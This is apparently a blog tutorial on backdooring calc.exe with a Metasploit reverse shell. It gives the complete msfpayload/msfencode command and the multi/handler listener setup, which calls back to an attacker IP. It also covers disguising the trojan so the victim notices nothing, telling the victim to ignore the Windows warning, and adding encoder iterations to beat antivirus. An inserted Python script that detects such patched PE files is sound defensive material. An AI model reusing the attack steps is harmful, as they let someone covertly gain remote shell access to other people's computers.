In my previous posts I explained how to create our own payload to gain access to a victim's machine.
But that approach had a problem: when a targeted user launches a backdoored executable such as the one we generated, nothing appears to happen, and that can raise suspicions.
To improve your chances of not tipping off a target, you can launch a payload while simultaneously continuing normal execution of the launched application.
So I am going to download an executable that works on Windows 7; for this I chose the Calculator program.
In this listing, we download the Calculator executable and then inject into calc.exe using the -k flag, which configures the payload to launch in a separate thread from the main executable, so the application behaves normally while the payload is being executed.
When choosing to embed a payload in an executable, you should consider using GUI-based applications if you're not specifying the -k flag. If you embed a payload into a console-based application, when the payload is run it will display a console window that won't close until you're finished using the payload. If you choose a GUI-based application and do not specify the -k flag, when the payload is executed the target will not see a console window.
Paying attention to these little details can help you remain stealthy during an engagement.
msfencode can encode an msfpayload into an existing executable so that the new executable still functions like the original. So if you inject into calc.exe, you get calc.exe plus your backdoor.
For the list of msfencode options, type msfencode -h in a terminal.
Let’s make our new backdoored executable.
#msfpayload windows/shell_reverse_tcp LHOST=192.168.31.20 LPORT=8080 R | msfencode -t exe -x /home/sathish/Downloads/calc.exe -k -o /var/www/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
We add the R flag to the msfpayload command line to specify raw output, because we pipe its output directly into msfencode. We select the x86/shikata_ga_nai encoder with -e and an iteration count of 5 with -c, tell msfencode to produce an executable (-t exe) and write it with -o to /var/www/calc_backdoor.exe, and pass -k so the template keeps working by running the payload in a new thread. Finally, we run a quick check to ensure that the resulting file is in fact a Windows executable.
I have already built a web server, so the target machine can download the executable from it and execute it. We now have a functional calc.exe and our shell.
Windows will show a warning notification; ignore it and run the executable.
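From the defender's side, the technique described above leaves artefacts in the patched file itself: a template executable that has had code injected into it typically ends up with an extra executable section (often writable as well) and an entry point that no longer points into the original .text section. The following Python script is an added example, not part of the original post and not Metasploit's own tooling; it parses the PE headers with the standard library only and reports those anomalies. The layout it checks for is an assumption about how such patching generally looks rather than a signature of msfencode, and the sample images it builds are constructed in memory so that the script runs offline.

```python
import struct
import sys
from dataclasses import dataclass
from typing import List, Tuple

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumption: section names a normal linker gives to code; extend for your toolchain.
USUAL_CODE_SECTIONS = {".text", "CODE", ".code"}


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    @property
    def executable(self) -> bool:
        return bool(self.characteristics & IMAGE_SCN_MEM_EXECUTE)

    @property
    def writable(self) -> bool:
        return bool(self.characteristics & IMAGE_SCN_MEM_WRITE)

    def contains_rva(self, rva: int) -> bool:
        size = max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < self.virtual_address + size


def parse_pe(data: bytes) -> Tuple[int, List[Section]]:
    """Return (AddressOfEntryPoint, section headers) from a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_of_optional = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    optional = e_lfanew + 24
    # AddressOfEntryPoint sits at offset 16 of the optional header for PE32 and PE32+.
    entry = struct.unpack_from("<I", data, optional + 16)[0]
    table = optional + size_of_optional
    sections = []
    for i in range(num_sections):
        (name, vsize, vaddr, raw_size, _raw_ptr, _relocs, _lines,
         _nrelocs, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vaddr, vsize, raw_size, chars))
    return entry, sections


def inspect_pe(data: bytes) -> List[Tuple[str, str]]:
    """Heuristic checks; returns (code, detail) pairs, empty when nothing stands out."""
    entry, sections = parse_pe(data)
    findings: List[Tuple[str, str]] = []
    exec_sections = [s for s in sections if s.executable]
    if len(exec_sections) > 1:
        findings.append(("multiple-exec-sections", ", ".join(s.name for s in exec_sections)))
    for s in sections:
        if s.executable and s.writable:
            findings.append(("rwx-section", s.name))
    entry_section = next((s for s in sections if s.contains_rva(entry)), None)
    if entry_section is None:
        findings.append(("entry-outside-sections", f"0x{entry:x}"))
    elif exec_sections and entry_section is not exec_sections[0]:
        findings.append(("entry-not-in-first-code-section",
                         f"{entry_section.name} (first code section is {exec_sections[0].name})"))
    elif entry_section.name not in USUAL_CODE_SECTIONS:
        findings.append(("entry-in-unusual-section", entry_section.name))
    return findings


def build_pe(entry: int, sections: List[Tuple[str, int, int, int]]) -> bytes:
    """Constructed minimal PE32 header (no real code) used only to exercise the checks."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    size_of_optional = 224  # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    optional = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(size_of_optional, b"\0")
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections)
    return dos + b"PE\0\0" + coff + optional + table


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


def sample_images() -> Tuple[bytes, bytes]:
    """Constructed samples: a plain layout and one with an injected RWX section at the entry point."""
    clean = build_pe(0x1010, [(".text", 0x1000, 0x2000, CODE), (".data", 0x3000, 0x1000, DATA)])
    patched = build_pe(0x4020, [(".text", 0x1000, 0x2000, CODE), (".data", 0x3000, 0x1000, DATA),
                                ("mzxqv", 0x4000, 0x1000, CODE | IMAGE_SCN_MEM_WRITE)])
    return clean, patched


if __name__ == "__main__":
    # Usage: python pe_check.py <file.exe> ...   (with no arguments the constructed samples are checked)
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or list(zip(("clean", "patched"), sample_images()))
    for label, image in targets:
        print(label, inspect_pe(image) or "no findings")
```

These checks are heuristics, not a verdict: packers, self-modifying installers and some .NET images also trip them, so treat a hit as a reason to compare the file against a known-good copy (hash, signature, section table) rather than as proof of tampering.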
Now that we have a working executable, we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse shell connections.
#msf > use exploit/multi/handler
#msf exploit(handler) > show options
#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
#msf exploit(handler) > set LHOST 192.168.31.20
#msf exploit(handler) > set LPORT 8080
We first use the multi/handler module and get a quick display of its options. Then we set our payload to a Windows reverse shell so that it matches the behavior of the executable we created earlier, tell it the IP and the port to listen on, and we're ready to go.
#msf exploit(handler) > exploit
Once the victim has downloaded the file and run it on his computer, you will see the connection come in on your machine.
This creates a channel through which you can access the Windows machine; you will now see that you have access to the C drive of the victim's computer, basically the drive on which the OS is installed.
One more thing to remember: it will work fine, but it is possible for antivirus installed on the victim's computer to catch it, so try encoding with more iterations and different encoder combinations.